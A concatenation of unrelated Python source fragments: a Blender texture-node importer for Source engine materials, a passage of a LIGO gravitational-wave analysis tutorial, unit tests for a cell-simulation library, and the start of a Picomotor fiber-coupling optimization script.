node_tree.links.new(multiply_node_z.outputs[0], add_node2.inputs[1])
separate_node: Node = node_tree.nodes.new('ShaderNodeSeparateXYZ')
separate_node.location = pos.loc()
node_tree.links.new(separate_node.outputs['X'], multiply_node_x.inputs[0])
node_tree.links.new(separate_node.outputs['Y'], multiply_node_y.inputs[0])
node_tree.links.new(separate_node.outputs['Z'], multiply_node_z.inputs[0])
return separate_node.inputs['Vector']
class _TextureInputBase(_MaterialInputBase):
color: _MaterialInputSocket
channels: '_SplitTextureInput'
alpha: _MaterialInputSocket
@abstractmethod
def setimage(self, image: import_vtf.StagedImage) -> None:
pass
class _TextureInput(_TextureInputBase):
def __init__(self, interpolation: str = 'Linear') -> None:
super().__init__()
self.interpolation = interpolation
self.image: Optional[import_vtf.StagedImage] = None
self.color = _MaterialInputSocket(self, 'Color')
self.channels = _SplitTextureInput(self.color)
self.alpha = _MaterialInputSocket(self, 'Alpha')
self.dimension_x = 300
self.dimension_y = 300
def setimage(self, image: import_vtf.StagedImage) -> None:
self.image = image
def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
if self.image is None:
raise Exception("texture input doesn't contain an image")
self.node: Node = node_tree.nodes.new('ShaderNodeTexImage')
self.node.image = self.image.get_image()
self.node.interpolation = self.interpolation
self.node.location = pos.loc()
class _TransformedTextureInput(_TextureInput):
def __init__(self, scale: Tuple[float, float] = (1, 1), rotate: float = 0, translate: Tuple[float, float] = (1, 1),
interpolation: str = 'Linear'):
super().__init__(interpolation)
self.scale = scale
self.rotate = rotate
self.translate = translate
self.dimension_x = 700
self.dimension_y = 400
def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
super().create(node_tree, pos)
coord_node: Node = node_tree.nodes.new('ShaderNodeTexCoord')
coord_node.location = pos.loc()
map_node: Node = node_tree.nodes.new('ShaderNodeMapping')
map_node.inputs['Scale'].default_value = (self.scale[0], self.scale[1], 1)
map_node.inputs['Rotation'].default_value = (0, 0, self.rotate)
map_node.inputs['Location'].default_value = (self.translate[0], self.translate[1], 0)
map_node.location = pos.loc(200)
node_tree.links.new(coord_node.outputs['UV'], map_node.inputs['Vector'])
self.node.location = pos.loc(400)
node_tree.links.new(map_node.outputs['Vector'], self.node.inputs['Vector'])
class _SplitTextureInput(_MaterialInputBase):
def __init__(self, texture_input: _MaterialInputSocket) -> None:
super().__init__((texture_input.primary_input, ))
self.input = texture_input
self.r = _MaterialInputSocket(self, 'R')
self.g = _MaterialInputSocket(self, 'G')
self.b = _MaterialInputSocket(self, 'B')
self.dimension_x = 200
self.dimension_y = 200
def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
self.node: Node = node_tree.nodes.new('ShaderNodeSeparateRGB')
self.node.location = pos.loc()
self.input.connect(node_tree, self.node.inputs['Image'])
class _BlendedTextureInput(_TextureInputBase):
def __init__(self, fac_inp: Union[_MaterialInputSocket, float],
a_inp: _TextureInputBase, b_inp: _TextureInputBase) -> None:
super().__init__()
self.input1 = a_inp
self.input2 = b_inp
self.color: _MaterialInputSocket = _BlendedColorInput(fac_inp, self.input1.color, self.input2.color).color
self.channels = _SplitTextureInput(self.color)
self.alpha: _MaterialInputSocket = _BlendedValueInput(fac_inp, self.input1.alpha, self.input2.alpha).value
def setimage(self, image: import_vtf.StagedImage) -> None:
self.input1.setimage(image)
def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
return
class _DetailedTextureInput(_TextureInputBase):
def __init__(self, base_inp: _TextureInputBase, detail_inp: _TextureInputBase, blend: float = 1) -> None:
super().__init__((base_inp, detail_inp))
self.base_inp = base_inp
self.detail_inp = detail_inp
self.blend = blend
self.color = _MaterialInputSocket(self, 'Color')
self.channels = _SplitTextureInput(self.color)
self.alpha = base_inp.alpha
self.dimension_x = 400
self.dimension_y = 250
def setimage(self, image: import_vtf.StagedImage) -> None:
self.base_inp.setimage(image)
def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
mul_node: Node = node_tree.nodes.new('ShaderNodeMixRGB')
mul_node.blend_type = 'MULTIPLY'
mul_node.location = pos.loc()
mul_node.inputs['Color2'].default_value = (2, 2, 2, 1)
mul_node.inputs['Fac'].default_value = 1
self.detail_inp.color.connect(node_tree, mul_node.inputs['Color1'])
self.node: Node = node_tree.nodes.new('ShaderNodeMixRGB')
self.node.location = pos.loc(200)
self.node.blend_type = 'MULTIPLY'
self.node.inputs['Fac'].default_value = self.blend
self.base_inp.color.connect(node_tree, self.node.inputs['Color1'])
node_tree.links.new(mul_node.outputs['Color'], self.node.inputs['Color2'])
class _BlendedColorInput(_MaterialInputBase):
def __init__(self, fac_inp: Union[_MaterialInputSocket, float],
a_inp: _MaterialInputSocket, b_inp: _MaterialInputSocket):
if isinstance(fac_inp, _MaterialInputSocket):
super().__init__((fac_inp.primary_input, a_inp.primary_input, b_inp.primary_input))
| |
Whitening requires no prior knowledge of spectral lines, etc; only the data are needed.
#
# To get rid of remaining high frequency noise, we will also bandpass the data.
#
# The resulting time series is no longer in units of strain; now in units of "sigmas" away from the mean.
#
# We will plot the whitened strain data, along with the signal template, after the matched filtering section, below.
# In[10]:
# function to whiten data
def whiten(strain, interp_psd, dt):
Nt = len(strain)
freqs = np.fft.rfftfreq(Nt, dt)
freqs1 = np.linspace(0,2048.,Nt/2+1)
# whitening: transform to freq domain, divide by asd, then transform back,
# taking care to get normalization right.
hf = np.fft.rfft(strain)
norm = 1./np.sqrt(1./(dt*2))
white_hf = hf / np.sqrt(interp_psd(freqs)) * norm
white_ht = np.fft.irfft(white_hf, n=Nt)
return white_ht
whiten_data = 1
if whiten_data:
# now whiten the data from H1 and L1, and the template (use H1 PSD):
strain_H1_whiten = whiten(strain_H1,psd_H1,dt)
strain_L1_whiten = whiten(strain_L1,psd_L1,dt)
# We need to suppress the high frequency noise (no signal!) with some bandpassing:
bb, ab = butter(4, [fband[0]*2./fs, fband[1]*2./fs], btype='band')
normalization = np.sqrt((fband[1]-fband[0])/(fs/2))
strain_H1_whitenbp = filtfilt(bb, ab, strain_H1_whiten) / normalization
strain_L1_whitenbp = filtfilt(bb, ab, strain_L1_whiten) / normalization
# ## Spectrograms
#
# Now let's plot a short time-frequency spectrogram around our event:
# In[11]:
if make_plots:
# index into the strain time series for this time interval:
indxt = np.where((time >= tevent-deltat) & (time < tevent+deltat))
# pick a shorter FTT time interval, like 1/8 of a second:
NFFT = int(fs/8)
# and with a lot of overlap, to resolve short-time features:
NOVL = int(NFFT*15./16)
# and choose a window that minimizes "spectral leakage"
# (https://en.wikipedia.org/wiki/Spectral_leakage)
window = np.blackman(NFFT)
# the right colormap is all-important! See:
# http://matplotlib.org/examples/color/colormaps_reference.html
# viridis seems to be the best for our purposes, but it's new; if you don't have it, you can settle for ocean.
#spec_cmap='viridis'
spec_cmap='ocean'
# Plot the H1 spectrogram:
plt.figure(figsize=(10,6))
spec_H1, freqs, bins, im = plt.specgram(strain_H1[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-deltat, deltat, 0, 2000])
plt.title('aLIGO H1 strain data near '+eventname)
plt.savefig(eventname+'_H1_spectrogram.'+plottype)
# Plot the L1 spectrogram:
plt.figure(figsize=(10,6))
spec_H1, freqs, bins, im = plt.specgram(strain_L1[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-deltat, deltat, 0, 2000])
plt.title('aLIGO L1 strain data near '+eventname)
plt.savefig(eventname+'_L1_spectrogram.'+plottype)
# In the above spectrograms, you may see lots of excess power below ~20 Hz, as well as strong spectral lines at 500, 1000, 1500 Hz (also evident in the ASDs above). The lines at multiples of 500 Hz are the harmonics of the "violin modes" of the fibers holding up the mirrors of the Advanced LIGO interferometers.
#
# Now let's zoom in on where we think the signal is, using the whitened data, in the hope of seeing a chirp:
# In[12]:
if make_plots:
# plot the whitened data, zooming in on the signal region:
# pick a shorter FTT time interval, like 1/16 of a second:
NFFT = int(fs/16.0)
# and with a lot of overlap, to resolve short-time features:
NOVL = int(NFFT*15/16.0)
# choose a window that minimizes "spectral leakage"
# (https://en.wikipedia.org/wiki/Spectral_leakage)
window = np.blackman(NFFT)
# Plot the H1 whitened spectrogram around the signal
plt.figure(figsize=(10,6))
spec_H1, freqs, bins, im = plt.specgram(strain_H1_whiten[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-0.5, 0.5, 0, 500])
plt.title('aLIGO H1 strain data near '+eventname)
plt.savefig(eventname+'_H1_spectrogram_whitened.'+plottype)
# Plot the L1 whitened spectrogram around the signal
plt.figure(figsize=(10,6))
spec_H1, freqs, bins, im = plt.specgram(strain_L1_whiten[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-0.5, 0.5, 0, 500])
plt.title('aLIGO L1 strain data near '+eventname)
plt.savefig(eventname+'_L1_spectrogram_whitened.'+plottype)
# Loud (high SNR) signals may be visible in these spectrograms. Compact object mergers show a characteristic "chirp" as the signal rises in frequency. If you can't see anything, try
# <a href='https://losc.ligo.org/events/GW150914/'>event GW150914</a>, by changing the `eventname` variable in the first cell above.
# ## Waveform Template
#
# The results of a full LIGO-Virgo analysis of this BBH event include a set of parameters that are consistent with a range of parameterized waveform templates. Here we pick one for use in matched filtering.
#
# As noted above, the results won't be identical to what is in the LIGO-Virgo papers, since we're skipping many subtleties, such as combining many consistent templates.
# In[13]:
# read in the template (plus and cross) and parameters for the theoretical waveform
try:
f_template = h5py.File(fn_template, "r")
except:
print("Cannot find template file!")
print("You can download it from https://losc.ligo.org/s/events/"+eventname+'/'+fn_template)
print("Quitting.")
quit()
# In[14]:
# extract metadata from the template file:
template_p, template_c = f_template["template"][...]
t_m1 = f_template["/meta"].attrs['m1']
t_m2 = f_template["/meta"].attrs['m2']
t_a1 = f_template["/meta"].attrs['a1']
t_a2 = f_template["/meta"].attrs['a2']
t_approx = f_template["/meta"].attrs['approx']
f_template.close()
# the template extends to roughly 16s, zero-padded to the 32s data length. The merger will be roughly 16s in.
template_offset = 16.
# whiten the templates:
template_p_whiten = whiten(template_p,psd_H1,dt)
template_c_whiten = whiten(template_c,psd_H1,dt)
template_p_whitenbp = filtfilt(bb, ab, template_p_whiten) / normalization
template_c_whitenbp = filtfilt(bb, ab, template_c_whiten) / normalization
# Compute, print and plot some properties of the template:
# constants:
clight = 2.99792458e8 # m/s
G = 6.67259e-11 # m^3/kg/s^2
MSol = 1.989e30 # kg
# template parameters: masses in units of MSol:
t_mtot = t_m1+t_m2
# final BH mass is typically 95% of the total initial mass:
t_mfin = t_mtot*0.95
# Final BH radius, in km:
R_fin = 2*G*t_mfin*MSol/clight**2/1000.
# complex template:
template = (template_p + template_c*1.j)
ttime = time-time[0]-template_offset
# compute the instantaneous frequency of this chirp-like signal:
tphase = np.unwrap(np.angle(template))
fGW = np.gradient(tphase)*fs/(2.*np.pi)
# fix discontinuities at the very end:
# iffix = np.where(np.abs(np.gradient(fGW)) > 100.)[0]
iffix = np.where(np.abs(template) < np.abs(template).max()*0.001)[0]
fGW[iffix] = fGW[iffix[0]-1]
fGW[np.where(fGW < 1.)] = fGW[iffix[0]-1]
# compute v/c:
voverc = (G*t_mtot*MSol*np.pi*fGW/clight**3)**(1./3.)
# index where f_GW is in-band:
f_inband = fband[0]
iband = np.where(fGW > f_inband)[0][0]
# index at the peak of the waveform:
ipeak = np.argmax(np.abs(template))
# number of cycles between inband and peak:
Ncycles = (tphase[ipeak]-tphase[iband])/(2.*np.pi)
print('Properties of waveform template in {0}'.format(fn_template))
print("Waveform family = {0}".format(t_approx))
print("Masses = {0:.2f}, {1:.2f} Msun".format(t_m1,t_m2))
print('Mtot = {0:.2f} Msun, mfinal = {1:.2f} Msun '.format(t_mtot,t_mfin))
print("Spins = {0:.2f}, {1:.2f}".format(t_a1,t_a2))
print('Freq at inband, peak = {0:.2f}, {1:.2f} Hz'.format(fGW[iband],fGW[ipeak]))
print('Time at inband, peak = {0:.2f}, {1:.2f} s'.format(ttime[iband],ttime[ipeak]))
print('Duration (s) inband-peak = {0:.2f} s'.format(ttime[ipeak]-ttime[iband]))
print('N_cycles inband-peak = {0:.0f}'.format(Ncycles))
print('v/c at peak = {0:.2f}'.format(voverc[ipeak]))
print('Radius of final BH = {0:.0f} km'.format(R_fin))
if make_plots:
plt.figure(figsize=(10,16))
plt.subplot(4,1,1)
plt.plot(ttime,template_p)
plt.xlim([-template_offset,1.])
plt.grid()
plt.xlabel('time (s)')
plt.ylabel('strain')
plt.title(eventname+' template at D_eff = 1 Mpc')
plt.subplot(4,1,2)
plt.plot(ttime,template_p)
plt.xlim([-1.1,0.1])
plt.grid()
plt.xlabel('time (s)')
plt.ylabel('strain')
#plt.title(eventname+' template at D_eff = 1 Mpc')
plt.subplot(4,1,3)
plt.plot(ttime,fGW)
plt.xlim([-1.1,0.1])
plt.grid()
plt.xlabel('time (s)')
plt.ylabel('f_GW')
#plt.title(eventname+' template f_GW')
plt.subplot(4,1,4)
plt.plot(ttime,voverc)
plt.xlim([-1.1,0.1])
plt.grid()
plt.xlabel('time (s)')
plt.ylabel('v/c')
#plt.title(eventname+' template v/c')
plt.savefig(eventname+'_template.'+plottype)
# ## Matched filtering to find the signal
#
# Matched filtering is the optimal way to find a known signal buried in stationary, Gaussian noise. It is the standard technique used by the gravitational wave community to find GW signals from compact binary mergers in noisy detector data.
#
# For some loud signals, it may be possible to see the signal in the whitened data or spectrograms. On the other hand, low signal-to-noise ratio (SNR) signals or signals which are of long duration in time may not be visible, even in the whitened data. LIGO scientists use matched filtering to find such "hidden" signals. A matched filter works by compressing the entire signal into one time bin (by convention, the "end time" of the waveform).
#
# LIGO uses a rather elaborate software suite to match the data against a family of such signal waveforms ("templates"), to find the best match. This procedure helps to "optimally" separate signals from instrumental noise, and to infer the parameters of the source (masses, spins, sky location, orbit orientation, etc) from the best match templates.
#
# A blind search requires us to search over many compact binary merger templates (eg, 250,000) with different masses and spins, as well as over all times in all detectors, and then requiring triggers coincident in time and template between detectors. It's an extremely complex and computationally-intensive "search pipeline".
#
# Here, we simplify things, using only one template (the one identified in the full search as being a good match to | |
<gh_stars>0
import unittest
from unittest import mock
from unittest.mock import MagicMock
from clovars.abstract import Circle
from clovars.bio import Cell, Treatment
from clovars.scientific import ConstantCellSignal, CellSignal, GaussianCellSignal, Gaussian
from clovars.utils import SimulationError
from tests import NotEmptyTestCase
class TestCell(NotEmptyTestCase):
"""Class representing unit-tests for clovars.bio.cell.Cell class."""
default_delta = 100
control_treatment = Treatment(
name="Control",
division_curve=Gaussian(loc=24.0, scale=5),
death_curve=Gaussian(loc=32, scale=5),
)
@classmethod
def setUpClass(cls) -> None:
"""Sets up the entire test suite by setting the default Treatment."""
pass
def setUp(self) -> None:
"""Sets up the test case subject (a Cell instance)."""
self.cell = Cell()
# def test_cell_has_default_treatment_class_attribute(self) -> None:
# """Tests whether a Cell has a "default_treatment" class attribute (a Treatment instance)."""
# self.assertTrue(hasattr(self.cell, 'default_treatment'))
# self.assertTrue(hasattr(Cell, 'default_treatment'))
# self.assertIsInstance(self.cell.default_treatment, Treatment)
def test_cell_has_name_attribute(self) -> None:
"""Tests whether a Cell has a "name" attribute (a string)."""
self.assertTrue(hasattr(self.cell, 'name'))
self.assertIsInstance(self.cell.name, str)
def test_cell_has_max_speed_attribute(self) -> None:
"""Tests whether a Cell has a "max_speed" attribute (a float value)."""
self.assertTrue(hasattr(self.cell, 'max_speed'))
self.assertIsInstance(self.cell.max_speed, float)
def test_cell_has_fate_attribute(self) -> None:
"""Tests whether a Cell has a "fate" attribute (a string)."""
self.assertTrue(hasattr(self.cell, 'fate'))
self.assertIsInstance(self.cell.fate, str)
def test_fate_attribute_starts_as_migration(self) -> None:
"""Tests whether a Cell starts with its "fate" attribute set to "migration"."""
self.assertEqual(Cell().fate, "migration")
def test_cell_has_seconds_since_birth_attribute(self) -> None:
"""Tests whether a Cell has a "seconds_since_birth" attribute (an integer)."""
self.assertTrue(hasattr(self.cell, 'seconds_since_birth'))
self.assertIsInstance(self.cell.seconds_since_birth, int)
def test_seconds_since_birth_attribute_starts_at_zero(self) -> None:
"""Tests whether a Cell starts with its "seconds_since_birth" attribute set to 0."""
self.assertEqual(Cell().seconds_since_birth, 0)
def test_cell_has_alive_attribute(self) -> None:
"""Tests whether a Cell has an "alive" attribute (a boolean value)."""
self.assertTrue(hasattr(self.cell, 'alive'))
self.assertIsInstance(self.cell.alive, bool)
def test_alive_attribute_starts_true(self) -> None:
"""Tests whether a Cell starts with its "alive" attribute set to True."""
self.assertEqual(Cell().alive, True)
def test_cell_has_senescent_attribute(self) -> None:
"""Tests whether a Cell has a "senescent" attribute (a boolean value)."""
self.assertTrue(hasattr(self.cell, 'senescent'))
self.assertIsInstance(self.cell.senescent, bool)
def test_senescent_attribute_starts_false(self) -> None:
"""Tests whether a Cell starts with its "senescent" attribute set to False."""
self.assertEqual(Cell().senescent, False)
def test_cell_has_fitness_memory_attribute(self) -> None:
"""Tests whether a Cell has a "fitness_memory" attribute (a float)."""
self.assertTrue(hasattr(self.cell, 'fitness_memory'))
self.assertIsInstance(self.cell.fitness_memory, float)
def test_fitness_memory_outside_zero_one_range_raises_error(self) -> None:
"""
Tests whether a Cell raises a SimulationError only when its "fitness_memory"
attribute is initialized outside the [0, 1] interval.
"""
for fitness_memory in [0.0, 0.2, 0.4, 0.6, 0.8, 1.0]:
try:
Cell(fitness_memory=fitness_memory)
except SimulationError:
self.fail(
"SimulationError was unexpectedly raised when initializing Cell"
f" with fitness_memory = {fitness_memory}"
)
for fitness_memory in [-0.1, 1.1]:
with self.assertRaises(SimulationError):
Cell(fitness_memory=fitness_memory)
def test_cell_has_division_threshold_attribute(self) -> None:
"""Tests whether a Cell has a "division_threshold" attribute (a float)."""
self.assertTrue(hasattr(self.cell, 'division_threshold'))
self.assertIsInstance(self.cell.division_threshold, float)
def test_division_threshold_outside_zero_one_range_raises_error(self) -> None:
"""
Tests whether a Cell raises a SimulationError only when its "division_threshold"
attribute is initialized outside the [0, 1] interval.
"""
for division_threshold in [0.0, 0.2, 0.4, 0.6, 0.8, 1.0]:
try:
Cell(division_threshold=division_threshold)
except SimulationError:
self.fail(
"SimulationError was unexpectedly raised when initializing Cell"
f" with division_threshold = {division_threshold}"
)
for division_threshold in [-0.1, 1.1]:
with self.assertRaises(SimulationError):
Cell(division_threshold=division_threshold)
def test_cell_division_threshold_attribute_is_between_zero_and_one(self) -> None:
"""
Tests whether the "division_threshold" attribute (random float value) lies between 0 and 1
when it is initialized as a None value.
"""
for _ in range(10):
cell = Cell(division_threshold=None)
with self.subTest(cell=cell):
self.assertGreaterEqual(cell.division_threshold, 0)
self.assertLessEqual(cell.division_threshold, 1)
def test_cell_has_death_threshold_attribute(self) -> None:
"""Tests whether a Cell has a "death_threshold" attribute (a float)."""
self.assertTrue(hasattr(self.cell, 'death_threshold'))
self.assertIsInstance(self.cell.death_threshold, float)
def test_death_threshold_outside_zero_one_range_raises_error(self) -> None:
"""
Tests whether a Cell raises a SimulationError only when its "death_threshold"
attribute is initialized outside the [0, 1] interval.
"""
for death_threshold in [0.0, 0.2, 0.4, 0.6, 0.8, 1.0]:
try:
Cell(death_threshold=death_threshold)
except SimulationError:
self.fail(
"SimulationError was unexpectedly raised when initializing Cell"
f" with death_threshold = {death_threshold}"
)
for death_threshold in [-0.1, 1.1]:
with self.assertRaises(SimulationError):
Cell(death_threshold=death_threshold)
def test_cell_death_threshold_attribute_is_between_zero_and_one(self) -> None:
"""
Tests whether the "death_threshold" attribute (random float value) lies between 0 and 1
when it is initialized as a None value.
"""
for _ in range(10):
cell = Cell(death_threshold=None)
with self.subTest(cell=cell):
self.assertGreaterEqual(cell.death_threshold, 0)
self.assertLessEqual(cell.death_threshold, 1)
def test_cell_has_death_threshold_attribute_is_between_zero_and_one(self) -> None:
"""Tests whether the "death_threshold" attribute (random float value) lies between 0 and 1."""
for _ in range(10):
cell = Cell()
with self.subTest(cell=cell):
self.assertGreaterEqual(cell.death_threshold, 0)
self.assertLessEqual(cell.death_threshold, 1)
def test_cell_has_circle_attribute(self) -> None:
"""Tests whether a Cell has a "circle" attribute (a Circle instance)."""
self.assertTrue(hasattr(self.cell, 'circle'))
self.assertIsInstance(self.cell.circle, Circle)
def test_cell_has_signal_attribute(self) -> None:
"""Tests whether a Cell has a "signal" attribute (a CellSignal instance)."""
self.assertTrue(hasattr(self.cell, 'signal'))
self.assertIsInstance(self.cell.signal, CellSignal)
def test_cell_uses_a_constant_signal_if_signal_argument_is_none(self) -> None:
"""Tests whether a Cell uses a ConstantCellSignal instance when initialized with signal=None."""
cell = Cell(signal=None)
self.assertIsInstance(cell.signal, ConstantCellSignal)
def test_cell_has_treatment_attribute(self) -> None:
"""Tests whether a Cell has a "treatment" attribute (a Treatment instance)."""
self.assertTrue(hasattr(self.cell, 'treatment'))
self.assertIsInstance(self.cell.treatment, Treatment)
# def test_cell_uses_the_default_treatment_if_treatment_argument_is_none(self) -> None:
# """Tests whether a Cell uses the "default_treatment" class attribute when initialized with treatment=None."""
# cell = Cell(signal=None)
# self.assertIs(cell.treatment, self.cell.default_treatment)
def test_calculate_division_chance_method_returns_chance_depending_on_the_cell_seconds_since_birth(self) -> None:
"""
Tests whether the "calculate_division_chance" method returns a chance between
[0, 1] proportional to the Cell's age.
"""
self.cell.treatment = self.control_treatment # division stats: 24 (+-5) hours
self.cell.seconds_since_birth = 0 # Very low chance of dividing right after birth
self.assertLess(self.cell.calculate_division_chance(delta=self.default_delta), 0.1)
self.cell.seconds_since_birth = 60 * 60 * 1000 # Very high chance of dividing after 1000 h
self.assertGreater(self.cell.calculate_division_chance(delta=self.default_delta), 0.9)
def test_calculate_death_chance_method_returns_chance_depending_on_the_cell_seconds_since_birth(self) -> None:
"""
Tests whether the "calculate_death_chance" method returns a chance between
[0, 1] proportional to the Cell's age.
"""
self.cell.treatment = self.control_treatment # death stats: 24 (+-5) hours
self.cell.seconds_since_birth = 0 # Very low chance of dying right after birth
self.assertLess(self.cell.calculate_death_chance(delta=self.default_delta), 0.1)
self.cell.seconds_since_birth = 60 * 60 * 1000 # Very high chance of dying after 1000 h
self.assertGreater(self.cell.calculate_death_chance(delta=self.default_delta), 0.9)
def test_cell_has_circle_attributes_as_properties(self) -> None:
"""Tests whether a Cell exposes relevant Circle attributes as properties."""
test_cell = Cell(x=10.0, y=20.0, radius=5.0)
for attr_name in ['x', 'y', 'radius', 'center', 'area']:
with self.subTest(attr_name=attr_name):
try:
value = getattr(test_cell, attr_name)
self.assertEqual(value, getattr(test_cell.circle, attr_name))
except AttributeError:
self.fail(f"Test failed: could not get attribute {attr_name} in Cell instance {test_cell}")
def test_cell_is_able_to_set_circle_attributes(self) -> None:
"""Tests whether a Cell is able to directly set its "x", "y" and "radius" Circle attributes."""
test_cell = Cell(x=10.0, y=20.0, radius=5.0)
for attr_name in ['x', 'y', 'radius']:
with self.subTest(attr_name=attr_name):
try:
setattr(test_cell, attr_name, 1.0)
except AttributeError:
self.fail(f"Test failed: could not set attribute {attr_name} in Cell instance {test_cell}")
def test_cell_distance_to_method_calculates_cell_distance_using_circles(self) -> None:
"""Tests whether the "distance_to" method uses Circles to calculate distance between Cells."""
other_cell = Cell()
with mock.patch("clovars.abstract.Circle.distance_to") as mock_circle_distance_to:
self.cell.distance_to(other_cell=other_cell)
mock_circle_distance_to.assert_called_once_with(other_cell.circle)
def test_cell_distance_to_method_raises_type_error_if_argument_is_not_a_cell(self) -> None:
"""
Tests whether the "distance_to" method raises a TypeError only when the
other_cell argument is not an actual Cell instance.
"""
valid_argument = Cell()
try:
self.cell.distance_to(other_cell=valid_argument)
except TypeError:
self.fail("Cell raised TypeError unexpectedly!")
invalid_argument = "WHATEVER ELSE"
with self.assertRaises(TypeError):
self.cell.distance_to(other_cell=invalid_argument) # noqa
def test_cell_has_hours_since_birth_property(self) -> None:
"""Tests whether a Cell has an "hours_since_birth" property (a float)."""
self.assertTrue(hasattr(self.cell, 'hours_since_birth'))
self.assertIsInstance(self.cell.hours_since_birth, float)
def test_hours_since_birth_calculations_are_correct(self) -> None:
"""Tests whether the "hours_since_birth" property correctly calculates the Cell's hours since birth."""
for seconds, hours in [(0, 0.0), (60, 1/60), (3600, 1.0), (7200, 2.0), (9000, 2.5)]:
with self.subTest(seconds=seconds, hours=hours):
self.cell.seconds_since_birth = seconds
self.assertEqual(self.cell.hours_since_birth, hours)
def test_cell_has_branch_name_property(self) -> None:
"""Tests whether a Cell has a "branch_name" property (a string)."""
self.assertTrue(hasattr(self.cell, 'branch_name'))
self.assertIsInstance(self.cell.branch_name, str)
def test_branch_name_returns_root_name_up_to_first_division(self) -> None:
"""Tests whether the "branch_name" property returns the Cell's root name, including the branch number."""
for cell_name, branch_name in [('1', '1'), ('3b.1', '3b'), ('15e-5.1.2', '15e-5'), ('4d-3.2.2.1.2', '4d-3')]:
with self.subTest(cell_name=cell_name, branch_name=branch_name):
self.cell.name = cell_name
self.assertEqual(self.cell.branch_name, branch_name)
def test_cell_has_colony_name_property(self) -> None:
"""Tests whether a Cell has a "colony_name" property (a string)."""
self.assertTrue(hasattr(self.cell, 'colony_name'))
self.assertIsInstance(self.cell.colony_name, str)
def test_colony_name_returns_root_name_up_to_branch_name(self) -> None:
"""Tests whether the "colony_name" property returns the Cell's root name, excluding the branch number."""
for cell_name, colony_name in [('1', '1'), ('3b.1', '3b'), ('15e-5.1.2', '15e'), ('4d-3.2.2.1.2', '4d')]:
with self.subTest(cell_name=cell_name, colony_name=colony_name):
self.cell.name = cell_name
self.assertEqual(self.cell.colony_name, colony_name)
def test_cell_has_generation_property(self) -> None:
"""Tests whether a Cell has a "generation" property (an integer)."""
self.assertTrue(hasattr(self.cell, 'generation'))
self.assertIsInstance(self.cell.generation, int)
def test_generation_returns_cell_name_prefix(self) -> None:
"""
Tests whether the "generation" property returns the number of times that the Cell has divided
based on its name.
"""
for cell_name, generation in [('1', 0), ('3b.1', 1), ('15e-5.1.2', 2), ('4d-3.2.2.1.2', 4)]:
with self.subTest(cell_name=cell_name, generation=generation):
self.cell.name = cell_name
self.assertEqual(self.cell.generation, generation)
def test_cell_has_signal_value_property(self) -> None:
"""Tests whether a Cell has a "signal_value" property (a float)."""
self.assertTrue(hasattr(self.cell, 'signal_value'))
| |
<reponame>robert-kauffman/fiber_coupling_optimization
from PicoMotor8742Controller import PicoMotor8742Controller
from PyDAQmx import *
from PyDAQmx.DAQmxConstants import *
import time
import numpy as np
#Globals for communication between computer and motors. Entered by user.
host = '169.254.179.96'
port = 23
#Number of samples wanted. More samples means less noise but longer read time. Entered by user.
num_samples = 1000
#The length of optimization time in seconds. Entered by user.
TIMEOUT = 300
#Desired power of fiber coupling for optimization. Entered by user.
desired_power = 30
#Creates communication between computer and motors.
pmc = PicoMotor8742Controller(host, port, 1)
#These globals define the use of the ThorLabs PM100A power meter used in the creation of this program.
power_meter = 'PM100A'
number_of_rescales = 0
#Read the output of the power meter in the form of an array of outputs.
def read_output():
read_array = np.zeros(num_samples)
samples_read = int32()
task = Task()
task.CreateAIVoltageChan('Dev3/AI0', "", DAQmx_Val_RSE, 0, 2, DAQmx_Val_Volts, None)
task.StartTask()
task.ReadAnalogF64(
num_samples,
-1,
DAQmx_Val_GroupByScanNumber,
read_array,
num_samples,
samples_read,
None
)
return read_array
#Function used only if the power_meter = 'PM100A'
#Power converts power meter output into mW and prompts rescaling of power meter to keep track of powers of 10.
def convert_PM100A_meter_output_to_mW():
global number_of_rescales
output = read_output().mean()
while output > 1.8:
input('Increase power meter range and then press enter.')
number_of_rescales = number_of_rescales + 1
output = read_output().mean()
power = (output / 2) * 0.0056 * 10 ** number_of_rescales
return power
#Find an average of the output array.
#Needs the power_meter string to know how to read/average specific power meter output.
def average_output():
if power_meter == 'PM100A':
mean_output = convert_PM100A_meter_output_to_mW()
else:
mean_output = read_output().mean()
return mean_output
#Relative motion of one motor. Used in the correct_hysteresis and explore functions.
#Requires the number of motor wanted in motion and its displacement.
def move_one_motor_rel(motor, motor_displacement):
pmc.move_axis_rel(axis=motor, displacement=motor_displacement)
#Absolute motion of one motor. Not in use currently*
#Requires the number of motor wanted in motion and its destination.
def move_one_motor_abs(motor, motor_target_position):
pmc.move_axis_rel(axis=motor, target_position=motor_target_position)
#Relative motion of two motors. Used in the correct_hysteresis funtion.
#Requires the numbers of the motors wanted in motion and their displacements.
def move_two_motors_rel(motor1, motor2, motor1_displacement, motor2_displacement):
pmc.move_axis_rel(axis=motor1, displacement=int(motor1_displacement))
pmc.move_axis_rel(axis=motor2, displacement=int(motor2_displacement))
#Absolute motion of two motors. Not in use currently*
#Requires the numbers of the motors wanted in motion and their destinations.
def move_two_motors_abs(motor1, motor2, motor1_target_position, motor2_target_position):
pmc.move_axis_abs(axis=motor1, target_position=int(motor1_target_position))
pmc.move_axis_abs(axis=motor2, target_position=int(motor2_target_position))
#Absolute motion of four motors. Used all throughout optimize function.
#Requires the numbers of the motors wanted in motion and their displacements in the form of an array.
def move_four_motors_abs(motor1, motor2, motor3, motor4, motor_positions):
motor1_target_position = motor_positions[0]
motor2_target_position = motor_positions[1]
